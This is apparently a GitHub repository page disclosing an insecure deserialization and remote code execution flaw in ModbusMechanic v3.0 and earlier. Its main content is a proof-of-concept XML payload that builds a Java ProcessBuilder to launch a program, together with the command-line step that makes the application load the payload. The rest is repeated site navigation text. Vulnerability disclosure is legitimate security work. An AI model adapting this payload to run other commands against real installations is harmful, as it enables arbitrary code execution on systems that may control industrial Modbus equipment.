ModbusMechanic V3.0 Insecure Deserialization & RCE

Affected Version: <= v3.0(latest release version)

Application: Here

Insecure Deserialization Vulnerability

<java>
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1" >
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start"/>
    </object>
</java>

Save the above code as PoC.xml file and put it in the project directory. Use the command "java -jar ModbusMechanic.jar -bridge PoC.xml" to start the jar package to trigger the vulnerability.

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
file		file
img		img
video		video
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

ModbusMechanic V3.0 Insecure Deserialization & RCE

Insecure Deserialization Vulnerability

Exploit

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Folders and files

Latest commit

History

Repository files navigation

ModbusMechanic V3.0 Insecure Deserialization & RCE

Insecure Deserialization Vulnerability

Exploit

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Packages